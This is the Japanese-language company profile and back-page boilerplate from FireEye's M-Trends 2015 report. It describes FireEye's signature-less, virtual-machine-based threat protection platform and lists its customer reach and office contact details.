FireEyeRは、次世代のサイバー攻撃から、世界中の民間企業や官公庁をリアルタイムで防御するために専用設計された、仮想マシンベースのセキュリティ・プラットフォームを発明した企業です。高度なサイバー攻撃は、次世代ファイアウォールやIPS、アンチウイルス、各種ゲートウェイなど、シグネチャベースのセキュリティ対策を容易にすり抜けてしまいます。FireEyeR脅威対策プラットフォームは、攻撃ライフサイクル全体で、モバイル、Web、電子メール、ファイル・システムといった主要な攻撃経路にわたり、シグネチャを利用しないリアルタイムでダイナミックな脅威防御策を組織へ提供します。FireEyeプラットフォームの核となる仮想実行エンジンは、Dynamic Threat Intelligence(DTI)によって補完されており、サイバー攻撃をリアルタイムに検出・防御することができます。FireEyeのソリューションは、世界67か国以上の2,700を超える組織に導入されており、Fortune 500企業の157社以上で利用されています。

Page 27: M-Trends 2015 セキュリティ最前線からの視点
Page 28: M-Trends 2015 セキュリティ最前線からの視点

A FireEye® Company

ファイア・アイ株式会社 | 〒101-0054 東京都千代田区神田錦町1-1 神田橋安田ビル6階 | TEL: 03-4577-4401 | [email protected] | www.FireEye.co.jp

FireEye, Inc. | 1440 McCarthy Blvd. Milpitas, CA 95035 | +1 408 321 6300 | www.FireEye.com

© 2015 FireEye, Inc. All rights reserved. MandiantとMロゴは、FireEye, Inc.の登録商標です。その他すべてのブランド名、製品、またはサービス名は、それぞれの所有者の商標またはサービスマークとして登録されている可能性があります。– RPT.MTRENDS.JA.022415